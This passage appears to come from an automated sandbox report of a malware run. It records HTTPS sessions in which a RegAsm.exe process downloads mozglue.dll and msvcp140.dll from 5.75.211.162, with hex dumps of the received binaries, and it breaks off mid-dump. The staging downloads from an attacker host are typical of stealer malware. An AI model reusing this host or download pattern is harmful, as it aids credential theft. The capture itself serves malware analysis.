2024-09-26 18:14:40 UTC	16384	IN	Data Raw: ff ff ff 13 bd 10 ff ff ff 01 c8 89 45 b4 11 df 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff 0f Data Ascii: E}1M1XM}}UU1M1UM] EH]EE\|1E1EMMuuU1M1Mu]uM11U\|uuMM1]1x
2024-09-26 18:14:40 UTC	16384	IN	Data Raw: c1 c2 08 89 88 90 00 00 00 31 d6 89 b0 9c 00 00 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 e8 Data Ascii: 1M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]w
2024-09-26 18:14:40 UTC	16384	IN	Data Raw: 7d 08 83 c4 0c 8a 87 18 01 00 00 30 03 8a 87 19 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 01 Data Ascii: }00C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwE
2024-09-26 18:14:40 UTC	16384	IN	Data Raw: 0e 81 e6 fc 03 00 00 33 8e 70 3b 08 10 8b 75 e0 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac d1 Data Ascii: 3p;u^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?Uu
2024-09-26 18:14:40 UTC	16384	IN	Data Raw: 00 00 c7 45 bc 00 00 00 00 8d 45 e0 50 e8 04 5a 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f Data Ascii: EEPZ}EPYEPYEPYFMPQW\|EppEPH[FMPQuo=EppEPN@w,0w
2024-09-26 18:14:40 UTC	16384	IN	Data Raw: 04 8d 44 24 70 50 e8 5b 1c 04 00 83 c4 04 8d 44 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00 Data Ascii: D$pP[D$`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE
2024-09-26 18:14:40 UTC	16384	IN	Data Raw: 7d 88 89 f8 f7 65 c8 89 55 84 89 85 0c fd ff ff 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff Data Ascii: }eUeLXee0@eeeue0UEeeUeee $
2024-09-26 18:14:40 UTC	16384	IN	Data Raw: 38 8b 4f 34 89 4d e4 8b 4f 30 89 4d d4 8b 4f 2c 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80 Data Ascii: 8O4MO0MO,MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEE
2024-09-26 18:14:40 UTC	16384	IN	Data Raw: 1c c1 ee 1a 01 c2 89 95 08 ff ff ff 8b bd 2c ff ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6 Data Ascii: ,0<48%8A)$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49727	5.75.211.162	443	2380	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 18:14:42 UTC	196	OUT	GET /mozglue.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 18:14:42 UTC	262	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 18:14:42 GMT Content-Type: application/octet-stream Content-Length: 608080 Connection: close Last-Modified: Thursday, 26-Sep-2024 18:14:42 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-26 18:14:42 UTC	16122	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
2024-09-26 18:14:42 UTC	16384	IN	Data Raw: c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 31 ff ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00 00 Data Ascii: #H1A$P~#HbA$P~#HUVuF\|FlNhFdFhFTNP
2024-09-26 18:14:42 UTC	16384	IN	Data Raw: ff 8b 45 a8 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d 3c Data Ascii: EPzEPWxP1`PHP$,FM1R'^_[]00L9tc<
2024-09-26 18:14:42 UTC	16384	IN	Data Raw: 06 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05 b9 Data Ascii: )0LY)0LZ\|!i(0C}L8!i(0u9Gu)0E8)0}L
2024-09-26 18:14:42 UTC	16384	IN	Data Raw: 83 c4 04 89 45 f0 8b 06 8b 4e 04 85 c9 0f 8e b3 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0 89 Data Ascii: EN1B]zB\|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSRE
2024-09-26 18:14:42 UTC	16384	IN	Data Raw: 42 fd ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc cc Data Ascii: BH) sH) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) s
2024-09-26 18:14:42 UTC	16384	IN	Data Raw: 00 00 85 db 0f 85 ad 07 00 00 c7 44 24 30 00 00 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 34 Data Ascii: D$0D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F\|$4rD$ D$ WVjjPS,VL$4
2024-09-26 18:14:42 UTC	16384	IN	Data Raw: 8b b8 08 00 00 00 85 ff 0f 84 0b 06 00 00 83 fb 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 3c Data Ascii: D$4P<\|$\$t@)GD$ P08z.Jt_@u`\|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3<
2024-09-26 18:14:42 UTC	16384	IN	Data Raw: 83 e1 fe 83 e0 01 09 c8 89 42 04 89 13 8d 44 24 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 8b Data Ascii: BD$XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKN
2024-09-26 18:14:42 UTC	16384	IN	Data Raw: b9 00 00 00 00 0f 44 4c 24 04 31 db 39 c1 0f 97 c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48 Data Ascii: DL$19rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49728	5.75.211.162	443	2380	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 18:14:43 UTC	197	OUT	GET /msvcp140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 18:14:44 UTC	262	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 18:14:44 GMT Content-Type: application/octet-stream Content-Length: 450024 Connection: close Last-Modified: Thursday, 26-Sep-2024 18:14:44 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-26 18:14:44 UTC	16122	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
2024-09-26 18:14:44 UTC	16384	IN	Data Raw: 72 00 2d 00 62 00 61 00 00 00 68 00 72 00 2d 00 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 